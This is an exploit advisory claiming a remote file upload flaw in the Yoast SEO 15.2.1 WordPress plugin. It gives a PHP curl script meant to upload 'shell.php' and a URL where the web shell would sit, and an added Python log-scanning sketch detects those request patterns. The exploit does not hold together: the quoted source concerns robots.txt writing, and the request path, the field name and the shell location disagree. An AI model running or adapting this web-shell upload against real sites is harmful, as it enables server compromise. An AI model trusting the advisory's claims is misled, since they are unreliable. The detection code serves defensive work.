* Exploit Title: WordPress Plugin Yoast SEO 15.2.1 - Remote File Upload
* Google Dork: N/A
* Date: 2020.11.10
* Exploit Author: OmideMehraban
* Vendor Homepage: https://wordpress.org/plugins/wordpress-seo
* Software Link: https://wordpress.org/plugins/wordpress-seo
* Category: webapps
* Version: 15.2.1
* Tested on: Windows 10, Firefox
* CVE : N/A
Vulnerable Source:
61: fwrite fwrite($f, $robotsnew);
60: $f = fopen($robots_file, 'w+');
21: $robots_file = $home_path . 'robots.txt';
18: $home_path = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR; // if(!is_writable($home_path) && !empty($_SERVER)),
15: $home_path = get_home_path();
58: $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew']));
requires:
45: if(isset($_POST['submitrobots']))
57: if(isset($_POST['robotsnew']) && file_exists($robots_file))
59: if(is_writable($robots_file))
Exploit:
<?php
$Omid="shell.php";
$ch = curl_init("http://localhost/wordpress/wp-content/admin/views/tool-file-editor.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$Omid"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg
*********************************************************
* Discovered By OmideMehraban
* Instagram: @omidemehraban
* Telegram: @omiid
*********************************************************
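
Detection sketch for the two request shapes shown above, added here as an example and not part of the original advisory: it flags direct requests to the tool-file-editor.php view file and paths where a .php name is followed by ";" and a second extension. The combined access-log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line: "METHOD PATH PROTO" STATUS
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Patterns taken from the URLs on this page (rule names are hypothetical).
VIEW_FILE = re.compile(r'/admin/views/tool-file-editor\.php(?:[/?]|$)', re.I)
DOUBLE_EXT = re.compile(r'\.php;\.[a-z0-9]{1,5}(?:[/?]|$)', re.I)
PATH_INFO_PHP = re.compile(r'\.php/[^?]*\.php', re.I)

def classify(line):
    """Return the sorted list of rule names that one log line triggers."""
    m = REQ.search(line)
    if not m:
        return []
    path = unquote(m.group("path"))  # decode %3B and similar before matching
    hits = set()
    if VIEW_FILE.search(path):
        # View templates are included by WordPress, not requested by clients.
        hits.add("direct-view-post" if m.group("method") == "POST"
                 else "direct-view-access")
    if DOUBLE_EXT.search(path):
        hits.add("php-semicolon-extension")
    if PATH_INFO_PHP.search(path):
        hits.add("php-path-info-chain")
    return sorted(hits)

def scan(lines):
    """Return (line index, rules) for every line that triggers a rule."""
    results = [(i, classify(line)) for i, line in enumerate(lines)]
    return [(i, rules) for i, rules in results if rules]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2020:10:00:01 +0000] "POST /wordpress/wp-content/admin/views/tool-file-editor.php HTTP/1.1" 404 512',
    '203.0.113.7 - - [10/Nov/2020:10:00:03 +0000] "GET /wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg HTTP/1.1" 404 512',
    '198.51.100.4 - - [10/Nov/2020:10:05:00 +0000] "POST /wordpress/wp-admin/admin.php?page=wpseo_tools&tool=file-editor HTTP/1.1" 200 9000',
    '198.51.100.4 - - [10/Nov/2020:10:05:02 +0000] "GET /wordpress/robots.txt HTTP/1.1" 200 67',
    '203.0.113.9 - - [10/Nov/2020:10:06:00 +0000] "GET /wordpress/wp-content/uploads/a.php%3B.jpg HTTP/1.1" 404 512',
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_LOG):
        print(idx, ", ".join(rules))
```

The status code is parsed but not used for filtering, so a hit with a 200 response can be triaged ahead of 404s by whoever consumes the output.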